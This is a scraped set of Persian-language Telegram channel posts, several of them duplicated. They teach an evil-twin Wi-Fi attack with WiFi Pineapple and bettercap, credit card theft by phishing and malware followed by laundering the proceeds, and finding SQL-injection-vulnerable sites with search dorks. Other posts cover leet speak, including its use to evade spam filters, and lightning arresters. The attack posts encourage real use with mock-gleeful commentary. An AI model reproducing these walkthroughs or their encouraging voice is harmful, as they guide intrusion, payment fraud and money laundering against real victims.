| کانال امنیت و شبکه |
Photo
🔴👺حمله دو قلوی شیطانی یا evil twin attack چیه و چجوری میتونیم انجامش بدیم و به شبکه های بی سیم نفوذ کنیم ؟!😎
🔴شبکه های بی سیم نسبت به شبکه های سیمی آسیب پذیر تر هستن و راحتتر میتونن مورد نفوذ قرار بگیرن؛ یکی از این آسیب پذیری ها اینه که مکانیزم درستی برای تشخیص تفاوت دو فرکانس رادیویی با SSID(اسم یکسان) رو ندارن.
یعنی چی؟!
فرض کنید مثل تصویر رفتید یه کافی شاپ و به یه مودم به اسم FreeWiFi متصل شدین، مهاجم میاد وسط و اسم مودم خودش رو میزاره FreeWiFi، بعد مک ادرس مودم اصلی رو جعل میکنه و در نهایت سیگنالی قوی تر از سیگنال مودم کافی شاپ به سمت شما ارسال میکنه و چون شما Auto Join یا همون اتصال خودکارتون به دستگاهایی که از قبل بهش متصل شدین فعاله، از مودم اصلی قطع میشید و به مودم نفوذگر متصل میشید و حالا نفوذگر میتونه با ارسال بدافزار به سیستمتون خودش رو جای MitM یا همون شخص ثالثی ک در شبکه وجود داره(مطابق شکل) بزنه و به اطلاعاتتون نفوذ کنه😅
البته اگر Auto Join فعال نباشه باید از طریق حمله احراز هویت یا de-authentication attack بطور دستی و از طریق فریم های تایید اعتبار جعلی ارتباط رو از مودم اصلی قطع و به مودم خودتون متصل کنید که در این حالت برخلاف حالت قبلی کاربر متوجه قطعی میشه...
⚠️یه نکته ای که وجود داره اینه که تو سازمان های بزرگ به این راحتی نیست و اگه رمزنگاری PSK فعال باشه، نیاز به دیکریپشن هم هست...
🔴معرفی ابزارهای پیاده سازی این حمله
🔹یکی از ابزارهایی که تمام موارد مورد نیاز این حمله رو فراهم میکنه، WiFi Pineapple هستش.
در واقع این ابزار یک باتری قدرتمند داره و میتونه سیگنالهای قوی ارسال کنه؛ این دستگاه رو میتونید توی کوله پشتی یا صندوق عقب ماشینتون که جلوی ساختمون تارگت پارک شده قرار بدین و بزارید کارشو بکنه🙃
🔹اما عیبی که Pineapple داره اینه که بخاطر قدرت سیگنالهاش، به راحتی قابل تشخیصه، بنابراین ما میتونیم از ابزار دیگه ای بنام bettercap با سیگنالهای متوسط و در حدی که لپتاپ ها قادر به دریافتش باشن ارسال میکنه و اینجوری ردیابیش هم مشکل تر👌🏼
🔴مراحل این حمله به چه صورته؟!
1️⃣ تو گام اول به مکان مورد نظر میریم و SSID وایفای اونجارو یادداشت میکنیم و بعد تنظیمات Pineapple مون رو مطابق با اون قرار میدیم و حالا اکسس پوینت جعلیمون ساخته شده😌
2️⃣ مرحله دوم مختص به شبکه های عمومیه و اگه تارگتتون عمومی نیست از این مرحله رد بشید... از اونجایی که تو شبکه های عمومی معمولا پروتکل pppoe فعاله (اگه نمیدونی چیه پستهای قبلیو بخون)، در نتیجه یک پورتال وجود داره که کاربر باید اطلاعاتش رو قبل اتصال وارد بکنه و شما میتونید با جعل اون صفحه، اولین دیتاهارو از تارگت به جیب بزنید 😎😂
3️⃣ تو مرحله سوم باید قربانیان رو به هر طریقی به اتصال به اکسس پوینت جعلی دعوت کنید که یا کاربران جدیدی که وارد میشن هستن، یا کاربرانی هستن که از طریق Auto Join میپیوندن، یا کاربرانی که از طریق de authentication اونهارو متقاعد کردید و یا راه اخر اینکه یه حمله ddos ترتیب بدین(اگه نمیدونی چیه پستهای قبلیو بخون) و بعد از قطع اتصال کاربران از اکسس پوینت اصلی، به شبکه شما متصل میشن.
4️⃣ تو مرحله چهارم که شما به عنوان شخص ثالث شبکه به (MitM) قرار دارید، هر دیتایی که کاربر در بستر شبکه رد و بدل میکنه دسترسی دارید. مثل اطلاعات لاگین به سایتها ، اطلاعات حساب های بانکی و... .
🔴بریم یه دوتا سناریوی واقعی از این حمله بگیم تا ذهنتون باز بشه
🔹فرض کنید تو فرودگاه نشستید و شبکه ی دوقلوی شیطانی رو ایجاد کردید و کاربر بدون اطلاع از نا امنی شبکه، قصد کارت به کارت میکنه و مبلغی رو به حساب دوستش میزنه ولی اتفاقی که میفته، اینه که حساب خودتون رو با حساب مقصد جایگزین میکنید و بعد رسید جعلی رو نشون کاربر میدید که فکر کنه مبلغ به حساب دوستش واریز شده، در حالی که به حساب شما اومده🫠
🔹سناریو دوم
نفوذگر یه صفحه جعلی ایجاد میکنه و میگه که نیاز به لاگین با اکانت گوگل یا فیسبوک هست و بعد قربانی رو هدایت میکنه به صفحه های جعلی این سایت ها و اونجا اطلاعات رو وارد میکنه و به دست هکر میرسه، در این حالت یه پیغام خطا به کاربر نشون میده و کاربر مجبور میشه که دوباره اطلاعات رو وارد کنه و ایندفعه به صفحه اصلی گوگل وارد میشه و لاگین موفقیت امیز انجام میگیره با این تفاوت که اطلاعات کاربر دست نفوذگر افتاده و میتونه از اونها سو استفاده کنه و یا در دارک وب بفروش بگذاره.
🔴راههای جلوگیری از این حمله چیه؟!
اتصال نشدن به وایفای های عمومی، غیرفعال کردن Auto Join و استفاده از دستگاه WIPS به عنوان مدیران شبکه.
🔴طبق گزارش پلیس فدرال روزانه ده ها کاربر از این طریق قربانی میشن، و اگاهی از این حمله باعث میشه که هم احتیاط ما بالا بره و هم در صورت نیاز از اون استفاده کنیم😅
👤 Drwcsi
💎 Channel: @DevelopixNetwork
🔴شبکه های بی سیم نسبت به شبکه های سیمی آسیب پذیر تر هستن و راحتتر میتونن مورد نفوذ قرار بگیرن؛ یکی از این آسیب پذیری ها اینه که مکانیزم درستی برای تشخیص تفاوت دو فرکانس رادیویی با SSID(اسم یکسان) رو ندارن.
یعنی چی؟!
فرض کنید مثل تصویر رفتید یه کافی شاپ و به یه مودم به اسم FreeWiFi متصل شدین، مهاجم میاد وسط و اسم مودم خودش رو میزاره FreeWiFi، بعد مک ادرس مودم اصلی رو جعل میکنه و در نهایت سیگنالی قوی تر از سیگنال مودم کافی شاپ به سمت شما ارسال میکنه و چون شما Auto Join یا همون اتصال خودکارتون به دستگاهایی که از قبل بهش متصل شدین فعاله، از مودم اصلی قطع میشید و به مودم نفوذگر متصل میشید و حالا نفوذگر میتونه با ارسال بدافزار به سیستمتون خودش رو جای MitM یا همون شخص ثالثی ک در شبکه وجود داره(مطابق شکل) بزنه و به اطلاعاتتون نفوذ کنه😅
البته اگر Auto Join فعال نباشه باید از طریق حمله احراز هویت یا de-authentication attack بطور دستی و از طریق فریم های تایید اعتبار جعلی ارتباط رو از مودم اصلی قطع و به مودم خودتون متصل کنید که در این حالت برخلاف حالت قبلی کاربر متوجه قطعی میشه...
⚠️یه نکته ای که وجود داره اینه که تو سازمان های بزرگ به این راحتی نیست و اگه رمزنگاری PSK فعال باشه، نیاز به دیکریپشن هم هست...
🔴معرفی ابزارهای پیاده سازی این حمله
🔹یکی از ابزارهایی که تمام موارد مورد نیاز این حمله رو فراهم میکنه، WiFi Pineapple هستش.
در واقع این ابزار یک باتری قدرتمند داره و میتونه سیگنالهای قوی ارسال کنه؛ این دستگاه رو میتونید توی کوله پشتی یا صندوق عقب ماشینتون که جلوی ساختمون تارگت پارک شده قرار بدین و بزارید کارشو بکنه🙃
🔹اما عیبی که Pineapple داره اینه که بخاطر قدرت سیگنالهاش، به راحتی قابل تشخیصه، بنابراین ما میتونیم از ابزار دیگه ای بنام bettercap با سیگنالهای متوسط و در حدی که لپتاپ ها قادر به دریافتش باشن ارسال میکنه و اینجوری ردیابیش هم مشکل تر👌🏼
🔴مراحل این حمله به چه صورته؟!
1️⃣ تو گام اول به مکان مورد نظر میریم و SSID وایفای اونجارو یادداشت میکنیم و بعد تنظیمات Pineapple مون رو مطابق با اون قرار میدیم و حالا اکسس پوینت جعلیمون ساخته شده😌
2️⃣ مرحله دوم مختص به شبکه های عمومیه و اگه تارگتتون عمومی نیست از این مرحله رد بشید... از اونجایی که تو شبکه های عمومی معمولا پروتکل pppoe فعاله (اگه نمیدونی چیه پستهای قبلیو بخون)، در نتیجه یک پورتال وجود داره که کاربر باید اطلاعاتش رو قبل اتصال وارد بکنه و شما میتونید با جعل اون صفحه، اولین دیتاهارو از تارگت به جیب بزنید 😎😂
3️⃣ تو مرحله سوم باید قربانیان رو به هر طریقی به اتصال به اکسس پوینت جعلی دعوت کنید که یا کاربران جدیدی که وارد میشن هستن، یا کاربرانی هستن که از طریق Auto Join میپیوندن، یا کاربرانی که از طریق de authentication اونهارو متقاعد کردید و یا راه اخر اینکه یه حمله ddos ترتیب بدین(اگه نمیدونی چیه پستهای قبلیو بخون) و بعد از قطع اتصال کاربران از اکسس پوینت اصلی، به شبکه شما متصل میشن.
4️⃣ تو مرحله چهارم که شما به عنوان شخص ثالث شبکه به (MitM) قرار دارید، هر دیتایی که کاربر در بستر شبکه رد و بدل میکنه دسترسی دارید. مثل اطلاعات لاگین به سایتها ، اطلاعات حساب های بانکی و... .
🔴بریم یه دوتا سناریوی واقعی از این حمله بگیم تا ذهنتون باز بشه
🔹فرض کنید تو فرودگاه نشستید و شبکه ی دوقلوی شیطانی رو ایجاد کردید و کاربر بدون اطلاع از نا امنی شبکه، قصد کارت به کارت میکنه و مبلغی رو به حساب دوستش میزنه ولی اتفاقی که میفته، اینه که حساب خودتون رو با حساب مقصد جایگزین میکنید و بعد رسید جعلی رو نشون کاربر میدید که فکر کنه مبلغ به حساب دوستش واریز شده، در حالی که به حساب شما اومده🫠
🔹سناریو دوم
نفوذگر یه صفحه جعلی ایجاد میکنه و میگه که نیاز به لاگین با اکانت گوگل یا فیسبوک هست و بعد قربانی رو هدایت میکنه به صفحه های جعلی این سایت ها و اونجا اطلاعات رو وارد میکنه و به دست هکر میرسه، در این حالت یه پیغام خطا به کاربر نشون میده و کاربر مجبور میشه که دوباره اطلاعات رو وارد کنه و ایندفعه به صفحه اصلی گوگل وارد میشه و لاگین موفقیت امیز انجام میگیره با این تفاوت که اطلاعات کاربر دست نفوذگر افتاده و میتونه از اونها سو استفاده کنه و یا در دارک وب بفروش بگذاره.
🔴راههای جلوگیری از این حمله چیه؟!
اتصال نشدن به وایفای های عمومی، غیرفعال کردن Auto Join و استفاده از دستگاه WIPS به عنوان مدیران شبکه.
🔴طبق گزارش پلیس فدرال روزانه ده ها کاربر از این طریق قربانی میشن، و اگاهی از این حمله باعث میشه که هم احتیاط ما بالا بره و هم در صورت نیاز از اون استفاده کنیم😅
👤 Drwcsi
💎 Channel: @DevelopixNetwork
🔥9👍3
👍4
🟢زبان leet چیه ؟!
🔰خب شاید دیده باشید که اطرافیانِ ۱۵-۱۶ سالتون که ادعای هکری دارن و با یه سوییشرت مشکی و کلاه به سر تردد میکنن🥷🏼، اسامی فضای مجازیشون به شکل خاصی نوشته میشه، مثلا ho3ein یا r0ya یا 5ara و یا r3za و هزاران ترکیب دیگه؛ که به این طرز نوشتار زبان لیت میگن. قدیم تر ها که این زبان عمومی نبود (دهه ۱۹۸۰) هکرها از این زبان برای ارتباط با همدیگه استفاده میکردن.
🔰وقتی به شکل سنتی از لیت استفاده میشه، خروجی کلمه از لحاظ بصری مشابه کلمه اصلی هستش و در واقع بیشتر اشخاص قادر ب تشخیصش هستن.😅 مثل عدد معروف 0.7734 که اگه تو ماشین حساب نوشته بشه و برعکس بهش نگاه کنیم hello رو میبینیم. 📟
🔰خب حالا الان که ۱۹۸۰ نیست و دیگه اکثریت باهاش اشنا هستن پس لیت به چه دردی میخوره؟!
1️⃣در واقع از اونجایی که فقط انسانها از لحاظ بصری قادر به خوندنشون هستن و کامپیوترها عاجز😬، برای زمانی که میخوایم یه ایمیلی بفرستیم و هرزنامه تشخیص داده نشه ویا یه پست یا محتوایی رو داخل سایت و یا شبکه اجتماعی ای بزنیم که خزندگان موتورهای جستجو و یا رباتهای شبکه های اجتماعی قادر به تشخیص محتوای اونا نشن، از این زبان استفاده میکنیم.
2️⃣کاربرد بعدیش توی استفاده در رمز عبور ها هستش، برای فردی که داره تولید میکنه راحته که به خاطر بسپرتش اما برای شخص ثالث که بتونه حدس بزنه (بروت فورس) و یا اگر جلوش وارد کردید بخاطر بسپره، دشوار به نظر میرسه و امنیتتون رو یه پله بالا میبره.
🔰زبان لیت میتونه کاربردای دیگه ای هم داشته باشه که به خلاقیت خودتون ازش استفاده کنید🙃
👤 Drwcsi
💎 Channel: @DevelopixNetwork
🔰خب شاید دیده باشید که اطرافیانِ ۱۵-۱۶ سالتون که ادعای هکری دارن و با یه سوییشرت مشکی و کلاه به سر تردد میکنن🥷🏼، اسامی فضای مجازیشون به شکل خاصی نوشته میشه، مثلا ho3ein یا r0ya یا 5ara و یا r3za و هزاران ترکیب دیگه؛ که به این طرز نوشتار زبان لیت میگن. قدیم تر ها که این زبان عمومی نبود (دهه ۱۹۸۰) هکرها از این زبان برای ارتباط با همدیگه استفاده میکردن.
🔰وقتی به شکل سنتی از لیت استفاده میشه، خروجی کلمه از لحاظ بصری مشابه کلمه اصلی هستش و در واقع بیشتر اشخاص قادر ب تشخیصش هستن.😅 مثل عدد معروف 0.7734 که اگه تو ماشین حساب نوشته بشه و برعکس بهش نگاه کنیم hello رو میبینیم. 📟
🔰خب حالا الان که ۱۹۸۰ نیست و دیگه اکثریت باهاش اشنا هستن پس لیت به چه دردی میخوره؟!
1️⃣در واقع از اونجایی که فقط انسانها از لحاظ بصری قادر به خوندنشون هستن و کامپیوترها عاجز😬، برای زمانی که میخوایم یه ایمیلی بفرستیم و هرزنامه تشخیص داده نشه ویا یه پست یا محتوایی رو داخل سایت و یا شبکه اجتماعی ای بزنیم که خزندگان موتورهای جستجو و یا رباتهای شبکه های اجتماعی قادر به تشخیص محتوای اونا نشن، از این زبان استفاده میکنیم.
2️⃣کاربرد بعدیش توی استفاده در رمز عبور ها هستش، برای فردی که داره تولید میکنه راحته که به خاطر بسپرتش اما برای شخص ثالث که بتونه حدس بزنه (بروت فورس) و یا اگر جلوش وارد کردید بخاطر بسپره، دشوار به نظر میرسه و امنیتتون رو یه پله بالا میبره.
🔰زبان لیت میتونه کاربردای دیگه ای هم داشته باشه که به خلاقیت خودتون ازش استفاده کنید🙃
👤 Drwcsi
💎 Channel: @DevelopixNetwork
👍13🔥2
| کانال امنیت و شبکه |
👤 Drwcsi 💎 Channel: @DevelopixNetwork
⚡️صاعقه گیر یا Lightning Arrester چیه؟!
خب فرض کنید برای اخر هفته با دوستتون رفتید کویر 🏜 از شانستون رعد و برق میزنه و دوستتون رو مورد هدف قرار میگیره و خشک میشه 🗿 حالا چرا؟ چون قد دوستتون بلندتر بوده 😶 در واقع صاعقه ها بلند ترین سطح رو مورد هدف قرار میدن؛ حالا جدای از اینکه میفهمیم باید با دوست قد بلند بریم کویر😅، از این موضوع میتونیم توی تجهیزات شبکه استفاده بکنیم...
در واقع ما میتونیم برای در امان ماندن از صاعقه در ساختمانهایی که در اونها تجهیزات وجود داره و یا تجهیزات خارج از ساختمان مثل دکل ها ، از صاعقه گیر ها استفاده کنیم.
چجوری کار میکنن؟!
روند کار صاعقه گیرها به این صورته که از طریق یه میله ی رسانا که در بالاترین سطح قرار گرفته، انرژی رو دریافت میکنن و از طریق یه هادی میانی اون رو انتقال میدن به زمین یا همون چاه ارث.
حالا چاه ارث چیه؟
انقدر زمین رو میکَنیم تا به سطح مرطوبش برسیم و بعد یه تخته مسی ای که سیم هادی از بالای ساختمان بهش جوش شده رو قرار میدیم و همچنین یک لوله پلیکای عمود بر تخته و در نهایت یک سری خاک های مخصوص مثل رس و ماسه و خاک سرند شده و ... داخلش میریزیم تا بتونیم انرژی رو در اونجا تخلیه کنیم.
امیدوارم مفید بوده باشه براتون 🥲💜
#تجهیزات_شبکه
👤 Drwcsi
💎 Channel: @DevelopixNetwork
خب فرض کنید برای اخر هفته با دوستتون رفتید کویر 🏜 از شانستون رعد و برق میزنه و دوستتون رو مورد هدف قرار میگیره و خشک میشه 🗿 حالا چرا؟ چون قد دوستتون بلندتر بوده 😶 در واقع صاعقه ها بلند ترین سطح رو مورد هدف قرار میدن؛ حالا جدای از اینکه میفهمیم باید با دوست قد بلند بریم کویر😅، از این موضوع میتونیم توی تجهیزات شبکه استفاده بکنیم...
در واقع ما میتونیم برای در امان ماندن از صاعقه در ساختمانهایی که در اونها تجهیزات وجود داره و یا تجهیزات خارج از ساختمان مثل دکل ها ، از صاعقه گیر ها استفاده کنیم.
چجوری کار میکنن؟!
روند کار صاعقه گیرها به این صورته که از طریق یه میله ی رسانا که در بالاترین سطح قرار گرفته، انرژی رو دریافت میکنن و از طریق یه هادی میانی اون رو انتقال میدن به زمین یا همون چاه ارث.
حالا چاه ارث چیه؟
انقدر زمین رو میکَنیم تا به سطح مرطوبش برسیم و بعد یه تخته مسی ای که سیم هادی از بالای ساختمان بهش جوش شده رو قرار میدیم و همچنین یک لوله پلیکای عمود بر تخته و در نهایت یک سری خاک های مخصوص مثل رس و ماسه و خاک سرند شده و ... داخلش میریزیم تا بتونیم انرژی رو در اونجا تخلیه کنیم.
امیدوارم مفید بوده باشه براتون 🥲💜
#تجهیزات_شبکه
👤 Drwcsi
💎 Channel: @DevelopixNetwork
👍8❤1
| کانال امنیت و شبکه |
👇🏼💸معرفی کاردینگ و کاردر😅 👤 Drwcsi 💎 Channel: @DevelopixNetwork
🛑💸کاردینگ چیه و کاردر کیه؟!
🥷🏼کاردینگ یعنی دزدیدن اطلاعات کارتهای بانکی و شستشوی اونها.
و کاردر هم به کسی گفته میشه که مشغول به کاردینگه...
🔶خب بریم مفصل توضیحش بدیم.
گفتیم دزیدن اطلاعات کارتهای بانکی، پس لازمه اول راجع به کارتهای بانکی بین المللی اطلاعات بدست بیاریم.
کارتهای خارجی تایپ های مختلفی دارن که مزایا و معایبشو نوشتم:
💳مستر: مستر کارت یه کارت جهانیه با امنیت متوسط و ضمانت متوسط.
💳اکسپرسس: امنیت زیادی داره، ضماتت خیلی زیاد، خرید آسان اما کارتی کمیاب.
💳ویزا: ویزا کارت هم جهانیه ، امنیت پایینی داره و ضمانت کم.
[اینجا یه پرانتز باز میکنم و امنیت و ضمانت رو توضیح میدم، امنیت که مشخصه، یعنی هر چقدر امنیت بیشتر باشه، کارِ کاردر برای دزدیدن اطلاعات اون، سختتره.
و ضمانت یعنی در صورت رخ دادن همچین اتفاق هایی مثل کاردینگ، بانک گردن بگیرش بالاست یا نه😅 در واقع خسارت رو قبول میکنه یا نه؟ بعضی از بانکها بدون اینکه حتی کاربر متوجه بشه پول رو بازگشت میزنن و از جیب خودشون میدن اما بعضی بانک ها کاربرر رو مقصر میدونن، با این تفاسیر بهترین کارت اکسپرسس امریکا هستش]
🔶مبحث بعدی دبیت کارت و کردیت کارته
توی خیلی از کشورها، علیرغم ایران که فقط دبیت کارت داره، کردیت کارد دارن. یعنی چی؟ تو دبیت کارتها فقط میتونی به اندازه پولت خرج کنی ولی کردیت کارتا هر چقدر بخوای (تا سقفی که پیش اون بانک اعتبار داری) و به هر واحد پولی که بخوای، بانک برات حساب میکنه و تو اخر ماه باهاش صاف میکنی. (که خب اینجا معلوم میشه ک کردیت کارتها بیشتر مناسب کار مان😎 دزدی بدون محدودیت داریم اینجا😂)
🔶حالا خود این کردیت کارتها، که کارتهای مورد بحث ما هستن رو، میشه به دو نوع ازشون سو استفاده کرد :
1️⃣تولید کارتای جعلی با حد کم که معمولا با باگ گرفتن از درگاه های بانکی انجام میشه، مثلا بعضی درگاها رنج دادن که از ۱۲۳۴ تا ۲۲۳۴ رنج بین ترکیه است و نفوذگر هم میزنه جنریت میکنه و از اعتبار کلی کارت که اصلا وجود ندارن استفاده میشه 😄 اما خب معمولا اعتبارشون رو کمترین حالته. توضیحات کاملتر این روش رو تو این پست میتونید بخونید.
2️⃣روش بعدی جعلِ کارتهای واقعی هستش که اینجا معمولا اعتبار کاربرها بالاست و این یعنی میتونید خرید تپل بزنید 🫣🛒این جعل کارتهای واقعی با روش های مختلفی انجام پذیره که یکیشم فیشینگ یا همون جعل درگاه پرداخت هستش، یعنی شما میاید یه صفحه ای شبیه صفحه ی پرداختهای معتبر میسازید و به روشی، کاربر رو هدایت میکنید به اون صفحه، کاربرم که از همه جا غافل میاد از درگاه استفاده بکنه و اطلاعات کارت بانکیشو وارد میکنه و برای شما ارسال میشه :) ، روش دیگه اش دادن ویروس به کاربر و بعد نفوذ به کیف پولهاش و دریافت اطلاعات کارت بانکیشه ، روش دیگه هک سایتهای مرجع و بانکهاست که دیگه اون خیلی سطحش بالاست و به ما نمیخوره😅 ولی در اون حالت همه چیز تو مشتتونه و یه سرقت بزرگ 🙃👊🏻 و روشهای دیگه...
🔶خب ما تا اینجا کارتهارو شناختیم و فهمیدیم چجوری میشه اطلاعاتشون رو دریافت کرد
حالا میخوایم ببینیم بعد اینکه اطلاعاتشو دریافت کردیم چیکار میتونیم باهاش بکنیم؟
اینجاست که بحث پولشویی یا همون تبدیل پولایی که از راه خلاف بدست میاد به پول مشروع وسط میاد.
که اینم روشای مختلفی داره:
💵فروش اطلاعات کارت به افرادی که تو این حوزه فعالن
💵خرید زدن از سایتهای بین الملل مثل امازون یا خرید اکانت و نرم افزار و ... و بعد فروختن اونها به افرادی که خریدارن
💵خرید ارزهای دیجیتال
و ...
🔶بطور خلاصه کاردینگ به هر گونه دزدی از حساب های بانکی به هر روشی از جمله فیشینگ و ... گفته میشه و دنیای خیلی بزرگ و گسترده ای داره که سعی کردم تو این مطلب از سیر تا پیازش رو بگم امیدوارم مفید واقع شده باشه🧅😄
👤 Drwcsi
💎 Channel: @DevelopixNetwork
🥷🏼کاردینگ یعنی دزدیدن اطلاعات کارتهای بانکی و شستشوی اونها.
و کاردر هم به کسی گفته میشه که مشغول به کاردینگه...
🔶خب بریم مفصل توضیحش بدیم.
گفتیم دزیدن اطلاعات کارتهای بانکی، پس لازمه اول راجع به کارتهای بانکی بین المللی اطلاعات بدست بیاریم.
کارتهای خارجی تایپ های مختلفی دارن که مزایا و معایبشو نوشتم:
💳مستر: مستر کارت یه کارت جهانیه با امنیت متوسط و ضمانت متوسط.
💳اکسپرسس: امنیت زیادی داره، ضماتت خیلی زیاد، خرید آسان اما کارتی کمیاب.
💳ویزا: ویزا کارت هم جهانیه ، امنیت پایینی داره و ضمانت کم.
[اینجا یه پرانتز باز میکنم و امنیت و ضمانت رو توضیح میدم، امنیت که مشخصه، یعنی هر چقدر امنیت بیشتر باشه، کارِ کاردر برای دزدیدن اطلاعات اون، سختتره.
و ضمانت یعنی در صورت رخ دادن همچین اتفاق هایی مثل کاردینگ، بانک گردن بگیرش بالاست یا نه😅 در واقع خسارت رو قبول میکنه یا نه؟ بعضی از بانکها بدون اینکه حتی کاربر متوجه بشه پول رو بازگشت میزنن و از جیب خودشون میدن اما بعضی بانک ها کاربرر رو مقصر میدونن، با این تفاسیر بهترین کارت اکسپرسس امریکا هستش]
🔶مبحث بعدی دبیت کارت و کردیت کارته
توی خیلی از کشورها، علیرغم ایران که فقط دبیت کارت داره، کردیت کارد دارن. یعنی چی؟ تو دبیت کارتها فقط میتونی به اندازه پولت خرج کنی ولی کردیت کارتا هر چقدر بخوای (تا سقفی که پیش اون بانک اعتبار داری) و به هر واحد پولی که بخوای، بانک برات حساب میکنه و تو اخر ماه باهاش صاف میکنی. (که خب اینجا معلوم میشه ک کردیت کارتها بیشتر مناسب کار مان😎 دزدی بدون محدودیت داریم اینجا😂)
🔶حالا خود این کردیت کارتها، که کارتهای مورد بحث ما هستن رو، میشه به دو نوع ازشون سو استفاده کرد :
1️⃣تولید کارتای جعلی با حد کم که معمولا با باگ گرفتن از درگاه های بانکی انجام میشه، مثلا بعضی درگاها رنج دادن که از ۱۲۳۴ تا ۲۲۳۴ رنج بین ترکیه است و نفوذگر هم میزنه جنریت میکنه و از اعتبار کلی کارت که اصلا وجود ندارن استفاده میشه 😄 اما خب معمولا اعتبارشون رو کمترین حالته. توضیحات کاملتر این روش رو تو این پست میتونید بخونید.
2️⃣روش بعدی جعلِ کارتهای واقعی هستش که اینجا معمولا اعتبار کاربرها بالاست و این یعنی میتونید خرید تپل بزنید 🫣🛒این جعل کارتهای واقعی با روش های مختلفی انجام پذیره که یکیشم فیشینگ یا همون جعل درگاه پرداخت هستش، یعنی شما میاید یه صفحه ای شبیه صفحه ی پرداختهای معتبر میسازید و به روشی، کاربر رو هدایت میکنید به اون صفحه، کاربرم که از همه جا غافل میاد از درگاه استفاده بکنه و اطلاعات کارت بانکیشو وارد میکنه و برای شما ارسال میشه :) ، روش دیگه اش دادن ویروس به کاربر و بعد نفوذ به کیف پولهاش و دریافت اطلاعات کارت بانکیشه ، روش دیگه هک سایتهای مرجع و بانکهاست که دیگه اون خیلی سطحش بالاست و به ما نمیخوره😅 ولی در اون حالت همه چیز تو مشتتونه و یه سرقت بزرگ 🙃👊🏻 و روشهای دیگه...
🔶خب ما تا اینجا کارتهارو شناختیم و فهمیدیم چجوری میشه اطلاعاتشون رو دریافت کرد
حالا میخوایم ببینیم بعد اینکه اطلاعاتشو دریافت کردیم چیکار میتونیم باهاش بکنیم؟
اینجاست که بحث پولشویی یا همون تبدیل پولایی که از راه خلاف بدست میاد به پول مشروع وسط میاد.
که اینم روشای مختلفی داره:
💵فروش اطلاعات کارت به افرادی که تو این حوزه فعالن
💵خرید زدن از سایتهای بین الملل مثل امازون یا خرید اکانت و نرم افزار و ... و بعد فروختن اونها به افرادی که خریدارن
💵خرید ارزهای دیجیتال
و ...
🔶بطور خلاصه کاردینگ به هر گونه دزدی از حساب های بانکی به هر روشی از جمله فیشینگ و ... گفته میشه و دنیای خیلی بزرگ و گسترده ای داره که سعی کردم تو این مطلب از سیر تا پیازش رو بگم امیدوارم مفید واقع شده باشه🧅😄
👤 Drwcsi
💎 Channel: @DevelopixNetwork
👍16🔥1
😎🔥اموزش نفوذ به وبسایت ها
📌خب شاید بگید چه تیتر کلیشه ای و تکراری ای ! چون احتمالا بارها به گوشتون خورده ولی جز تبلیغ چنل اصغر هک ، چیز دیگه ای دستگیرتون نشده😅. ولی خب باید بگم این کار غیر ممکن نیست و با پیدا کردن آسیب پذیری ها میشه انجامش داد 🙃
📌یکی از این آسیب پذیری ها ، SQL injection یا تزریق SQL هستش💉.
🔹یه توضیح اجمالی درباره SQL بدم و بریم سراغ اصل مطلب.
خب همونطور که خیلیاتون میدونید، SQL یه زبان برنامه نویسی برای ایجاد و مدیریت پایگاه های داده یا دیتابیس ها هستش، یعنی چی؟! یعنی میشه گفت تقریبا تمام اطلاعات سایت ها به روی یه بستری حفظ و نگهداری میشن و داخل اون طبقه بندی میشن که به اون بسترها پایگاه داده میگن. مثل چه اطلاعاتی؟! اطلاعات هویتی کاربران سایت، اطلاعات لاگین به سایت ادمین ها و یوزر ها، اطلاعات محصولات و ... .
🔹خب چی گفتم؟ اطلاعات لاگین ادمین ها 🙄🦷 وقت دندون تیز کردنه ؛ چرا که با بدست آوردن اطلاعات لاگین ادمین در واقع مدیریت کل سایت رو بدست میگیریم و همه چی تمومه😁...
📌خب بریم سراغ اصل مطلب یا همون پیاده سازیش😎
1️⃣مرحله اول پیاده سازی اینه که پیدا کنیم چه سایتهایی این آسیب پذیری رو دارن؟!
🔹ما میتونیم با کمک دورک نویسی این سایتهارو پیدا کنیم[اگه نمیدونی دورک چیه تو پستهای قبلی توضیحش دادم حتما بخون]؛ چندتا دورک پیشنهادی براتون مینویسم ولی در نهایت خودتون هم میتونید با سرچ کردن دورک های اماده ی مخصوص این اسیب پذیری رو پیدا کنید و تو طیف گسترده تری جستجوتون رو انجام بدین👌🏼🔎
🔻
🔹اگه دنبال گاورمنت ها نیستید میتونید پسوند های دیگه ای رو جستجو کنید برای مثال شرکت های تجاری (.com) یا بیزینس ها (.biz) یا شرکت های اطلاع رسانی (.info) و غیره رو برای کشورهای مختلف دیگه ای خارج از موارد بالا مثل کانادا (.ca) یا امارات (.ae) یا کلمبیا (.co) و ... استفاده کنید.
2️⃣تو مرحله دوم باید صفحات وبسایت مورد نظر رو تست کنیم که ببینیم کدوم صفحه باگ رو داره.
برای اینکار باید url اش رو دستکاری کنیم که اینکار خودش دوتا روش داره :
روش اول -> قرار دادن سینگل کوتیشن اخر ادرس سایت ؛ مثل:
در این حالت اگه سایت لود بشه که یعنی آسیب پذیر نیست ولی اگه آسیب پذیر باشه شمارو به صفحه ای با ادرس warning:mysqlfetcharray() منتقل کرد یعنی حاوی آسیب پذیریه و میتونیم کارمونو شروع کنیم 😎
و روش دوم -> استفاده از کلمه اند؛ مثل :
در این حالت سایت باید ناقص لود بشه و یا لود نشه تا متوجه بشیم آسیب پذیره، در غیر اینصورت آسیب پذیر نیست.
مابقی مراحل رو تو پست بعدی دنبال کنید 👀👇🏼
👤 Drwcsi
💎 Channel: @DevelopixNetwork
📌خب شاید بگید چه تیتر کلیشه ای و تکراری ای ! چون احتمالا بارها به گوشتون خورده ولی جز تبلیغ چنل اصغر هک ، چیز دیگه ای دستگیرتون نشده😅. ولی خب باید بگم این کار غیر ممکن نیست و با پیدا کردن آسیب پذیری ها میشه انجامش داد 🙃
📌یکی از این آسیب پذیری ها ، SQL injection یا تزریق SQL هستش💉.
🔹یه توضیح اجمالی درباره SQL بدم و بریم سراغ اصل مطلب.
خب همونطور که خیلیاتون میدونید، SQL یه زبان برنامه نویسی برای ایجاد و مدیریت پایگاه های داده یا دیتابیس ها هستش، یعنی چی؟! یعنی میشه گفت تقریبا تمام اطلاعات سایت ها به روی یه بستری حفظ و نگهداری میشن و داخل اون طبقه بندی میشن که به اون بسترها پایگاه داده میگن. مثل چه اطلاعاتی؟! اطلاعات هویتی کاربران سایت، اطلاعات لاگین به سایت ادمین ها و یوزر ها، اطلاعات محصولات و ... .
